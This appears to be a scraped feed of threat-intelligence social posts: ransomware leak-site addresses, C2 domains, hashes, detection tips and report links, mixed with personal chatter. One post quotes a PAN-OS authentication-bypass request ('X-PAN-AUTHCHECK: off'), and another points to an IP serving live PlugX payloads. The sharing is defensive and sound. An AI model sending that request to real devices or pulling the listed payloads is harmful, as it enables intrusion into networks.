Hope you get to feeling better bud :)

Credit:AlvieriD

Bluebox Ransomware DLS

zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion

Socgolish Domain:

*.material[.]amstillroofing[.]com

"We can now share that our latest investigation also found links between some of Doppelganger’s activities and individuals associated with MGIMO (Moscow State Institute of International Relations)."

via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...

Research_Reports.zip 6a15b145267baf3c492af4a9e8ee4f244ee5070f9a02e5516c12d78bcd60e4ff
interesting, using a domain name that isn't registered ... perhaps a typo? #apt #bitter

decoy on Security_Alert-US_MISSION_TO_PAKISTAN.pdf.lnk, beat by yogesh across the river by 31 minutes 😐
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e

More great examples why you need to give employees a trusted PDF tool
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.

FunkSec Ransomware DLS

7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion

I try to write technical blogs regularly on topics I’m interested in. Recently this has been a lot of reverse engineering, Bluetooth, and networking hacks. But there’s many other goodies too!

As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!

Initial Access Detection Opportunities
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft

RomCom/Storm-0978 exploits Firefox and Windows zero days in the wild
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE‑2024‑49039
welivesecurity.com/en/eset-rese...

Not quite Clue (would be a sick board game) but there's a pretty neat one called Backdoors and Breaches from BHIS that has similar vibe. Pretty cool lil deck of cards.

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 Note: Since this is 'breaking' news and more details are being released, we're updating this post as more details become available (and as we think of better memes). Mash that F5 key every so often fo...

GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off

GTFO! Come on, they are laughing at us now.

labs.watchtowr.com/pots-and-pan...

Helldown Ransomware: an overview of this emerging threat Comprehensive Analysis of Helldown: Tactics, Techniques, and Procedures (TTPs) and Exploitation of Zyxel Vulnerabilities %

New Helldown ransomware targets Windows and Linux systems, uses Zyxel firewall exploits for initial access

blog.sekoia.io/helldown-ran...

AiTM Phishing, Hold the Gabagool: Analyzing the Gabagool Phishing Kit Case study

medium.com/@traclabs_/a...

Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware

🚨🇺🇸Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com/sealevel-con...

QuickBooks popup scam still being delivered via Google ads | Malwarebytes When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.

The certificate on this malware caught my eye. 👀
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.

It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.

www.malwarebytes.com/blog/scams/2...

A goomba looking Garfield on a white background that has a message at the top: “Repost to waste 151k of Internet’s data”

You all know what to do

opendir apache-ish listing for 103.43.18.81

if plugx is your game, open dir with live payloads
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...

decoy doc showing forged singapore customs information

#sidewinder #apt targeting singapore with "sg customs" lure
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx

Smokeloader: The Pandora’s box of tricks, payloads and anti-analysis - BSides Portland 2022 YouTube video by BSides Portland

Smokeloader keeps crawling its way back into the limelight. If you want a primer on it, I gave a public talk on it 2 years ago

www.youtube.com/watch?v=O69e...

Using EclecticIQ’s analysis, I uncovered 39 additional domains linked to Chinese #ThreatActor #SilkSpecter, impersonating brands like IKEA, The North Face, Zalando and Zara.

Key IOCs:
trusttollsvg.js
collect.js

#ThreatIntel #OSINT #Scam #BlackFriday #Phishing

blog.eclecticiq.com/inside-intel...

🚨New Ransomware Group, "Termite," has named their first 5 victims
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion

Impostor Certificates It is common for malware to be signed with code signing certificates. How is this possible? Impostors receive the cert directly and sign malware. In this blog-post, we look at 100 certs used by Sol…

May 13, 2024 blogpost
It is common for malware to be signed with code signing certificates.

How is this possible? Impostors receive the cert directly and sign malware.

In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.

squiblydoo.blog/2024/05/13/i...

Said it once I'll say it again, UFO 50 and Animal Well are masterpieces worth every minute.

Man mass purging tweets is kindof a pain in the butt huh lol.

Absolute banger of a show, great writing and story. Really hope we get that MMO they were hammering on for a while, I need more of the lore in my veins.

Breachachu Has Allegedly Leaked the Source Code to Emirates Phishing Kit Archive Breachachu Has Allegedly Leaked the Source Code to Emirates Phishing Kit Archive

🚨Breachachu Has Allegedly Leaked the Source Code to Emirates Phishing Kit Archive
darkwebinformer.com/breachachu-h...